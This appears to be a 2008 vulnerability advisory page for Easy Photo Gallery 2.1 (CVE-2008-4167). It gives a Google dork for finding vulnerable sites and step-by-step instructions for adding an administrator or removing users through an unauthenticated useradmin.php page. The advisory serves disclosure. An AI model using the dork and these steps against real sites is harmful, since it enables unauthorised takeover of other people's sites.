Bug: Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability ( Ascii Version )

Search:
WLB2

Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability

Published
Credit
Risk
2008.09.23
Stack
Medium
CWE
CVE
Local
Remote
CWE-287
CVE-2008-4167
No
Yes
 Dork: "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.4/10
4.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
Partial

#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------

Exploit :
http://site.il/useradmin.php
how to use exploit
in Add user select
----------------------------------------
Simple example by Stack user :d :d
----------------------------------------
Add user
Name: Stack
Password: passstack
E-mail: Stack@hotmail.fr
Private: yes or no
Administrator: yes
now stack username is a administrator user
----------------------------------------
Remove user
User: chouse the user and click remove
----------------------------------------

References:

http://xforce.iss.net/xforce/xfdb/45119
http://www.securityfocus.com/bid/31161
http://www.milw0rm.com/exploits/6437

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version